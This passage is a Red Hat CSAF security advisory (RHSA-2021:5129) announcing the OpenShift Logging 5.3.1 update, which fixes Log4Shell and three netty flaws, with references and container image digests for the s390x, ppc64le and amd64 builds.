"details": "Low"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5129
Vulnerability from csaf_redhat
Published
2021-12-14 19:37
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: Openshift Logging security and bug update (5.3.1)
Notes
Topic
An update is now available for OpenShift Logging 5.3.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Openshift Logging Security and Bug Fix Release (5.3.1)
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* netty: Request smuggling via content-length header (CVE-2021-21409)
* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for OpenShift Logging 5.3.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Openshift Logging Security and Bug Fix Release (5.3.1)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* netty: Request smuggling via content-length header (CVE-2021-21409)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5129",
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "LOG-1897",
"url": "https://issues.redhat.com/browse/LOG-1897"
},
{
"category": "external",
"summary": "LOG-1925",
"url": "https://issues.redhat.com/browse/LOG-1925"
},
{
"category": "external",
"summary": "LOG-1962",
"url": "https://issues.redhat.com/browse/LOG-1962"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5129.json"
}
],
"title": "Red Hat Security Advisory: Openshift Logging security and bug update (5.3.1)",
"tracking": {
"current_release_date": "2024-12-12T01:17:17+00:00",
"generator": {
"date": "2024-12-12T01:17:17+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5129",
"initial_release_date": "2021-12-14T19:37:00+00:00",
"revision_history": [
{
"date": "2021-12-14T19:37:00+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T19:37:00+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:17+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "OpenShift Logging 5.3",
"product": {
"name": "OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:logging:5.3::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.3.1-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.3.1-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-66"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-43"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-46"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-65"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-63"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"product_id": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-70"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"product_id": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-73"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.3.1-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.3.1-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-66"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-43"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-46"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-65"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-63"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"product_id": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-70"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"product_id": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-73"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.3.1-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"product": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.3.1-12"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.3.1-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"product": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.3.1-12"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-66"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-43"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-46"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-65"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-63"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"product_id": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-70"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"product_id": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-73"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64 as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64"
},
"product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le as a component of OpenShift Logging 5.3",
"product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.3"
},
{
"category": "default_component_of",
"full_product_name": {
